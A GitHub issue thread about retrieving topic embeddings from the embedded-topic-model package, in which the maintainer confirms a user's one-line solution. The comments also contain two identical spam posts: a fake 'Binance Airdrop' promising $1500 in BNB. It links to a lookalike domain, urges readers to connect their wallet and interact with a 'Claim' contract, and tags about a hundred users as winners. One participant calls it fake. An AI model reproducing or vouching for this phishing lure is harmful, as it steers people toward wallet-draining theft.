### ISSUE TITLE
How could I get the topic embeddings？

### ISSUE THREAD

**Issue by broboboo** [lffloyd/embedded-topic-model#28]
Hello!
How could I get the topic embeddings, which is mentioned as alpha in the ETM original paper?
Thanks and waiting for your response!

**Comment by lfmatosm** [comment]
Hi @broboboo, how are you?
Thanks for your question. Currently, there's no method to retrieve the topic embeddings. They are initially defined here:
https://github.com/lfmatosm/embedded-topic-model/blob/71996073d584ec38070dbd62095a021f80bcdb19/embedded_topic_model/models/model.py#L44
I'm currently on a deadline in other projects, but as soon as I can, I will update the package to address this shortcoming.
I'm also open for pull requests, so feel free if its your cup of tea :)

**Comment by broboboo** [comment]
Thanks for your answer！
I found i can get the topic embeddings by this：
`topic_embeddings =  etm_instance.model.alphas.weight.detach().cpu().numpy()`
Is this correct? 
Thank you！

**Comment by anilv2k** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @LennonSantos, @arthurmelo777, @acbatista, @adaltoprado, @leovasc5, @northgabe, @edumangabeira, @rrogovski, @gilsondev, @FelipeFerreiraSS, @mvinif, @mrprompt, @caiotoledo, @hewerthomn, @thiagojacinto, @Figonana, @Elton-hst, @LyTT19, @Danarvelini, @mrcpicanco, @JoaoBatistaJr, @dageesgabriel, @PedrolaLima, @feikname, @venturalp, @arthurdelarge, @luciana-pereira, @emilyfaccin, @LacerdaRenan, @KleberNevesTrindade, @luishenrrique, @Dev-Pedrolima, @Sfcyber, @Sotoriva, @Ratkovski, @daltonypng, @fernandokelvi, @mauriciomendonca, @KaiqueeFigui, @PhilipsValita, @FredSoares, @pfantato, @dedemenezes, @Lucas98sf, @clarissacunhaa, @danirocha, @UlisesFco, @xchanmolx, @enokmichael, @victorvhs

**Comment by arthurmelo777** [comment]
This is fake guys. In the footer, the year is still 2023 and the buttons "About us" etc... are not working.

**Comment by anilv2k** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @henriqueyda, @DRS90, @caducoder, @Leanddro13, @AlexVictorB, @cesarrod11, @devhenrique22, @Stratham, @ciparthur, @aintluks, @lariredivo, @giovanemachado, @luccas-specht, @rodolformartins, @flavionobredev, @Ronald0Freire, @leandrosob, @Gus-MO, @MarcosFerreira17, @eric-faria, @Dev-JoseRonaldo, @amalvarenga, @marujore, @SchonsG, @jgoncalvescosta, @artursantiago, @Agustin-Mediotti, @wribeiiro, @jaquelinerv, @allangrds, @julianFBarbosa, @WilliamMN, @andersonzero0, @yggorcarvalho, @TamanduaDeAngola, @futuroDevLeo, @silasms, @Ciano23, @gassantos, @brunorfo, @GustavoGomesDias, @Macribeiro, @aunglay30949, @brenoASantana, @Ronaid-junior, @pedr0asoares, @mahzinhadj, @Wjhonney, @pl-90, @MatheusHG

**Comment by lfmatosm** [comment]
@broboboo yes, that's correct. Sorry for the delay.
